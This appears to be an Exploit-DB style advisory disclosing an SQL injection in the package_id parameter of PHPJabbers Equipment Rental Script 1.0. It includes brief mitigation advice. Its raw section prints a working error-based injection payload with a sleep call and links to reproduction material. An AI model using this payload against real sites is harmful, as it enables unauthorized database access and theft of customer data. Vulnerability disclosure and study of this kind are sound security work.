Equipment Rental Script-1.0 - SQL Injection

vendor:

Equipment Rental Script

by:

nu11secur1ty

6.1

CVSS

HIGH

SQL Injection

CWE

Product Name: Equipment Rental Script

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE: a:phpjabbers:equipment_rental_script:1.0

Metasploit:

Other Scripts:

Platforms Tested:

2023

Equipment Rental Script-1.0 – SQL Injection

The Equipment Rental Script-1.0 is vulnerable to SQL injection in the package_id parameter. By injecting a payload such as 'mysql', an attacker can manipulate the database and potentially retrieve sensitive information. An error message was triggered when the payload was injected, indicating the presence of a SQL injection vulnerability.

Mitigation:

To mitigate this vulnerability, input validation and parameterized queries should be implemented to prevent SQL injection attacks. Regular security assessments and code reviews can also help in identifying and addressing such vulnerabilities.

Source

Exploit-DB raw data:

## Title: Equipment Rental Script-1.0 - SQLi
## Author: nu11secur1ty
## Date: 09/12/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/equipment-rental-script/#sectionDemo
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The package_id parameter appears to be vulnerable to SQL injection
attacks. The payload ' was submitted in the package_id parameter, and
a database error message was returned. You should review the contents
of the error message, and the application's handling of other input,
to confirm whether a vulnerability is present. The attacker can steal
all information from the database!

[+]Payload:
mysql

Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: package_id=(-4488))) OR 1 GROUP BY
CONCAT(0x71787a6a71,(SELECT (CASE WHEN (7794=7794) THEN 1 ELSE 0
END)),0x7176717671,FLOOR(RAND(0)*2)) HAVING
MIN(0)#from(select(sleep(20)))a)&cnt=2&date_from=12/9/2023&hour_from=11&minute_from=00&date_to=12/9/2023&hour_to=12&minute_to=00

## Reproduce:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Equipment-Rental-Script-1.0

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
home page: https://www.nu11secur1ty.com/